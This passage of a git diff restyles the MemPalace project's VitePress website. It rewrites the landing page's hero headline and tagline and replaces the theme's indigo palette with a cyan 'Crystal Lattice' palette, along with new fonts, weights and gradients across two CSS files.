-          <span class="line line-2">identity.</span>
+          <span class="line">Memory <em class="is-accent">is</em></span>
+          <span class="line line-2"><span class="identity-white">identity.</span></span>
         </h1>
         <p class="lede">
-          An AI that forgets cannot know you. MemPalace keeps every word you have
-          shared — verbatim, on your machine, permanent. Designed for total
-          recall.
+          Every conversation, every idea, every small decision&hellip; held somewhere safe.
+          <br><br>Welcome to the future of memory: <span class="mp-blue">MemPalace</span>
         </p>
         <form class="waitlist waitlist-hero" data-source="hero" novalidate>
           <div class="waitlist-head">
diff --git a/website/.vitepress/theme/landing/landing.css b/website/.vitepress/theme/landing/landing.css
index 908ac8c82..313f906d5 100644
--- a/website/.vitepress/theme/landing/landing.css
+++ b/website/.vitepress/theme/landing/landing.css
@@ -24,23 +24,23 @@ body.mempalace-active .VPDoc {
 body.mempalace-active { overflow-x: hidden; }
 
 .mempalace-landing {
-  --void:        #05070A;
-  --obsidian:    #0A0D12;
-  --obsidian-2:  #11151C;
-  --ink:         #181D26;
-  --hair:        rgba(158, 216, 255, 0.14);
-  --hair-strong: rgba(158, 216, 255, 0.28);
-  --ice:         #EAF4FF;
-  --ice-dim:     #b8c7d9;
-  --ice-ghost:   rgba(234, 244, 255, 0.56);
-  --prism:       #9ED8FF;
-  --prism-core:  #4AA3FF;
-  --refract:     #A8B5FF;
-  --stellar:     #F3E7B0;
-  --ember:       #E28A6B;
+  --void:        #080C18;
+  --obsidian:    #0F1524;
+  --obsidian-2:  #182033;
+  --ink:         #1C2640;
+  --hair:        rgba(56, 189, 248, 0.14);
+  --hair-strong: rgba(56, 189, 248, 0.28);
+  --ice:         #DBE7F5;
+  --ice-dim:     #8B99B0;
+  --ice-ghost:   rgba(219, 231, 245, 0.56);
+  --prism:       #7DD3FC;
+  --prism-core:  #38BDF8;
+  --refract:     #A78BFA;
+  --stellar:     #FBBF24;
+  --ember:       #FF8B8B;
 
-  --f-display: "Cormorant Garamond", "Times New Roman", serif;
-  --f-body:    "Geist", ui-sans-serif, system-ui, sans-serif;
+  --f-display: "Neue Machina", "Satoshi", sans-serif;
+  --f-body:    "Onest", ui-sans-serif, system-ui, sans-serif;
   --f-mono:    "JetBrains Mono", ui-monospace, monospace;
 
   --measure: 68ch;
@@ -50,7 +50,7 @@ body.mempalace-active { overflow-x: hidden; }
   background: var(--void);
   color: var(--ice);
   font-family: var(--f-body);
-  font-weight: 300;
+  font-weight: 400;
   font-size: 16px;
   line-height: 1.6;
   -webkit-font-smoothing: antialiased;
@@ -60,16 +60,16 @@ body.mempalace-active { overflow-x: hidden; }
   position: relative;
 }
 .mempalace-landing * { box-sizing: border-box; }
-.mempalace-landing ::selection { background: var(--prism-core); color: var(--void); }
+.mempalace-landing ::selection { background: var(--prism-core); color: #080C18; }
 
 .mempalace-landing::before {
   content: "";
   position: fixed; inset: 0;
   pointer-events: none;
   background:
-    radial-gradient(80% 60% at 50% -10%, rgba(74,163,255,0.18), transparent 60%),
-    radial-gradient(40% 40% at 85% 20%, rgba(168,181,255,0.08), transparent 70%),
-    radial-gradient(50% 50% at 15% 80%, rgba(158,216,255,0.06), transparent 70%);
+    radial-gradient(80% 60% at 50% -10%, rgba(56,189,248,0.18), transparent 60%),
+    radial-gradient(40% 40% at 85% 20%, rgba(167,139,250,0.08), transparent 70%),
+    radial-gradient(50% 50% at 15% 80%, rgba(125,211,252,0.06), transparent 70%);
   z-index: 0;
 }
 .mempalace-landing::after {
@@ -153,7 +153,7 @@ body.mempalace-active { overflow-x: hidden; }
   line-height: 0.95;
   color: var(--ice);
 }
-.mempalace-landing .display em { font-style: italic; color: var(--prism); }
+.mempalace-landing .display em { font-style: italic; color: var(--prism-core); }
 .mempalace-landing .lede {
   font-family: var(--f-display);
   /* font-style: italic; */
@@ -237,8 +237,11 @@ body.mempalace-active { overflow-x: hidden; }
   margin: 0 0 1.25rem;
 }
 .mempalace-landing .hero h1 .line { display: block; }
-.mempalace-landing .hero h1 .line-2 { font-style: italic; color: var(--prism); font-weight: 300; }
+.mempalace-landing .hero h1 .line-2 { font-style: normal; font-weight: 400; }
+.mempalace-landing .hero h1 .is-accent { font-style: italic; color: var(--prism-core); font-weight: 300; }
+.mempalace-landing .hero h1 .identity-white { color: #ffffff; }
 .mempalace-landing .hero .lede { margin-bottom: 0; }
+.mempalace-landing .hero .lede .mp-blue { color: var(--prism-core); font-weight: 500; }
 .mempalace-landing .hero-cta {
   display: flex;
   flex-wrap: wrap;
diff --git a/website/.vitepress/theme/style.css b/website/.vitepress/theme/style.css
index 4aacc70a2..0d231901e 100644
--- a/website/.vitepress/theme/style.css
+++ b/website/.vitepress/theme/style.css
@@ -1,67 +1,73 @@
 /* ── MemPalace Custom Theme ──────────────────────────────────────────── */
-/* Deep indigo / cyan palette — evoking architectural grandeur          */
+/* Crystal Lattice palette — crystalline cyan through deep blue-black    */
 
 :root {
-  /* Brand palette */
-  --mp-indigo: #4f46e5;
-  --mp-indigo-light: #6366f1;
-  --mp-indigo-dark: #3730a3;
-  --mp-cyan: #06b6d4;
-  --mp-cyan-light: #22d3ee;
-  --mp-purple: #8b5cf6;
-  --mp-purple-light: #a78bfa;
-  --mp-emerald: #10b981;
-  --mp-amber: #f59e0b;
+  /* Crystal Lattice palette */
+  --mp-bg: #080C18;
+  --mp-surface: #0F1524;
+  --mp-surface-high: #182033;
+  --mp-border: #1C2640;
+  --mp-border-soft: #121829;
+  --mp-cyan: #7DD3FC;
+  --mp-cyan-vivid: #38BDF8;
+  --mp-ice: #DBE7F5;
+  --mp-body: #CDD5E0;
+  --mp-muted: #8B99B0;
+  --mp-dim: #5B6B82;
+  --mp-ok: #34D399;
+  --mp-warn: #FBBF24;
+  --mp-hot: #FF8B8B;
+  --mp-violet: #A78BFA;
 
   /* VitePress overrides */
-  --vp-c-brand-1: var(--mp-indigo);
-  --vp-c-brand-2: var(--mp-indigo-light);
-  --vp-c-brand-3: var(--mp-purple);
-  --vp-c-brand-soft: rgba(79, 70, 229, 0.14);
+  --vp-c-brand-1: var(--mp-cyan-vivid);
+  --vp-c-brand-2: var(--mp-cyan);
+  --vp-c-brand-3: var(--mp-violet);
+  --vp-c-brand-soft: rgba(56, 189, 248, 0.14);
 
-  --vp-font-family-base: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
-  --vp-font-family-mono: 'JetBrains Mono', 'Fira Code', monospace;
+  --vp-font-family-base: 'Onest', -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
+  --vp-font-family-mono: 'JetBrains Mono', monospace;
 
   /* Home hero gradient */
   --vp-home-hero-name-color: transparent;
-  --vp-home-hero-name-background: linear-gradient(135deg, var(--mp-indigo) 0%, var(--mp-cyan) 50%, var(--mp-purple) 100%);
-  --vp-home-hero-image-background-image: linear-gradient(135deg, rgba(79, 70, 229, 0.25) 0%, rgba(6, 182, 212, 0.25) 50%, rgba(139, 92, 246, 0.15) 100%);
+  --vp-home-hero-name-background: linear-gradient(135deg, var(--mp-ice) 0%, var(--mp-cyan-vivid) 60%, var(--mp-violet) 100%);
+  --vp-home-hero-image-background-image: linear-gradient(135deg, rgba(56, 189, 248, 0.25) 0%, rgba(125, 211, 252, 0.2) 50%, rgba(167, 139, 250, 0.15) 100%);
   --vp-home-hero-image-filter: blur(56px);
 
   /* Button colors */
   --vp-button-brand-border: transparent;
-  --vp-button-brand-text: #ffffff;
-  --vp-button-brand-bg: var(--mp-indigo);
+  --vp-button-brand-text: #080C18;
+  --vp-button-brand-bg: var(--mp-cyan-vivid);
   --vp-button-brand-hover-border: transparent;
-  --vp-button-brand-hover-text: #ffffff;
-  --vp-button-brand-hover-bg: var(--mp-indigo-light);
+  --vp-button-brand-hover-text: #080C18;
+  --vp-button-brand-hover-bg: var(--mp-cyan);
 
-  --vp-button-alt-border: rgba(79, 70, 229, 0.25);
-  --vp-button-alt-text: var(--mp-indigo);
-  --vp-button-alt-bg: rgba(79, 70, 229, 0.08);
-  --vp-button-alt-hover-border: rgba(79, 70, 229, 0.4);
-  --vp-button-alt-hover-text: var(--mp-indigo-dark);
-  --vp-button-alt-hover-bg: rgba(79, 70, 229, 0.14);
+  --vp-button-alt-border: rgba(56, 189, 248, 0.25);
+  --vp-button-alt-text: var(--mp-cyan-vivid);
+  --vp-button-alt-bg: rgba(56, 189, 248, 0.08);
+  --vp-button-alt-hover-border: rgba(56, 189, 248, 0.4);
+  --vp-button-alt-hover-text: var(--mp-cyan);
+  --vp-button-alt-hover-bg: rgba(56, 189, 248, 0.14);
 }
 
 /* Dark mode overrides */
 .dark {
-  --vp-c-brand-1: var(--mp-cyan-light);
+  --vp-c-brand-1: var(--mp-cyan-vivid);
   --vp-c-brand-2: var(--mp-cyan);
-  --vp-c-brand-3: var(--mp-purple-light);
-  --vp-c-brand-soft: rgba(6, 182, 212, 0.14);
+  --vp-c-brand-3: var(--mp-violet);
+  --vp-c-brand-soft: rgba(56, 189, 248, 0.14);
 
-  --vp-button-brand-bg: var(--mp-indigo-light);
-  --vp-button-brand-hover-bg: var(--mp-indigo);
+  --vp-button-brand-bg: var(--mp-cyan-vivid);
+  --vp-button-brand-hover-bg: var(--mp-cyan);
 
-  --vp-button-alt-border: rgba(34, 211, 238, 0.25);
-  --vp-button-alt-text: var(--mp-cyan-light);
-  --vp-button-alt-bg: rgba(34, 211, 238, 0.08);
-  --vp-button-alt-hover-border: rgba(34, 211, 238, 0.4);
+  --vp-button-alt-border: rgba(56, 189, 248, 0.25);
+  --vp-button-alt-text: var(--mp-cyan-vivid);
+  --vp-button-alt-bg: rgba(56, 189, 248, 0.08);
+  --vp-button-alt-hover-border: rgba(56, 189, 248, 0.4);
   --vp-button-alt-hover-text: var(--mp-cyan);
-  --vp-button-alt-hover-bg: rgba(34, 211, 238, 0.14);
+  --vp-button-alt-hover-bg: rgba(56, 189, 248, 0.14);
 
-  --vp-home-hero-image-background-image: linear-gradient(135deg, rgba(99, 102, 241, 0.3) 0%, rgba(6, 182, 212, 0.3) 50%, rgba(139, 92, 246, 0.2) 100%);
+  --vp-home-hero-image-background-image: linear-gradient(135deg, rgba(56, 189, 248, 0.3) 0%, rgba(125, 211, 252, 0.2) 50%, rgba(167, 139, 250, 0.15) 100%);
 }
 
 /* ── Hero section ───────────────────────────────────────────────────── */
@@ -72,19 +78,22 @@
 }
 
 .VPHero .name {
-  font-weight: 700 !important;
+  font-family: 'Neue Machina', 'Satoshi', sans-serif !important;
+  font-weight: 500 !important;
+  letter-spacing: -1.5px;
 }
 
 .VPHero .text {
+  font-family: 'Satoshi', 'Onest', sans-serif;
   font-weight: 500;
-  background: linear-gradient(135deg, var(--vp-c-text-1) 0%, var(--mp-indigo-light) 100%);
+  background: linear-gradient(135deg, var(--vp-c-text-1) 0%, var(--mp-cyan-vivid) 100%);
   -webkit-background-clip: text;
   -webkit-text-fill-color: transparent;
   background-clip: text;
 }
 
 .dark .VPHero .text {
-  background: linear-gradient(135deg, var(--vp-c-text-1) 0%, var(--mp-cyan-light) 100%);
+  background: linear-gradient(135deg, var(--mp-ice) 0%, var(--mp-cyan-vivid) 100%);
   -webkit-background-clip: text;
   -webkit-text-fill-color: transparent;
   background-clip: text;
@@ -99,16 +108,17 @@
 
 .VPFeature:hover {
   transform: translateY(-4px);
-  border-color: var(--mp-indigo);
-  box-shadow: 0 12px 40px rgba(79, 70, 229, 0.12);
+  border-color: var(--mp-cyan-vivid);
+  box-shadow: 0 12px 40px rgba(56, 189, 248, 0.12);
 }
 
 .dark .VPFeature:hover {
-  border-color: var(--mp-cyan);
-  box-shadow: 0 12px 40px rgba(6, 182, 212, 0.12);
+  border-color: var(--mp-cyan-vivid);
+  box-shadow: 0 12px 40px rgba(56, 189, 248, 0.12);
 }
 
 .VPFeature .title {
+  font-family: 'Satoshi', 'Onest', sans-serif;
   font-weight: 600;
 }
 
@@ -119,12 +129,12 @@
 }
 
 .VPSidebar .VPSidebarItem.is-active .text {
-  color: var(--mp-indigo) !important;
+  color: var(--mp-cyan-vivid) !important;
   font-weight: 600;
 }
 
 .dark .VPSidebar .VPSidebarItem.is-active .text {
-  color: var(--mp-cyan-light) !important;
+  color: var(--mp-cyan-vivid) !important;
 }
 
 /* ── Code blocks ────────────────────────────────────────────────────── */
@@ -135,21 +145,21 @@
 }
 
 .dark .vp-doc div[class*='language-'] {
-  border-color: rgba(6, 182, 212, 0.15);
+  border-color: rgba(56, 189, 248, 0.15);
 }
 
 /* ── Custom containers ──────────────────────────────────────────────── */
 
 .vp-doc .custom-block.tip {
-  border-color: var(--mp-cyan);
+  border-color: var(--mp-ok);
 }
 
 .vp-doc .custom-block.warning {
-  border-color: var(--mp-amber);
+  border-color: var(--mp-warn);
 }
 
 .vp-doc .custom-block.info {
-  border-color: var(--mp-indigo);
+  border-color: var(--mp-cyan-vivid);
 }
 
 /* ── Tables ─────────────────────────────────────────────────────────── */
@@ -160,19 +170,20 @@
 }
 
 .vp-doc th {
-  background: rgba(79, 70, 229, 0.06);
+  background: rgba(56, 189, 248, 0.06);
   font-weight: 600;
 }
 
 .dark .vp-doc th {
-  background: rgba(6, 182, 212, 0.08);
+  background: rgba(56, 189, 248, 0.08);
 }
 
 /* ── Nav ────────────────────────────────────────────────────────────── */
 
 .VPNavBar .VPNavBarTitle .title {
-  font-weight: 700;
-  letter-spacing: -0.01em;
+  font-family: 'Neue Machina', 'Satoshi', sans-serif;
+  font-weight: 500;
+  letter-spacing: -0.4px;
 }
 
 /* ── Footer ─────────────────────────────────────────────────────────── */
@@ -193,11 +204,11 @@
 }
 
 ::-webkit-scrollbar-thumb:hover {
-  background: var(--mp-indigo);
+  background: var(--mp-cyan-vivid);
 }
 
 .dark ::-webkit-scrollbar-thumb:hover {
-  background: var(--mp-cyan);
+  background: var(--mp-cyan-vivid);
 }
 
 /* ── Smooth transitions ─────────────────────────────────────────────── */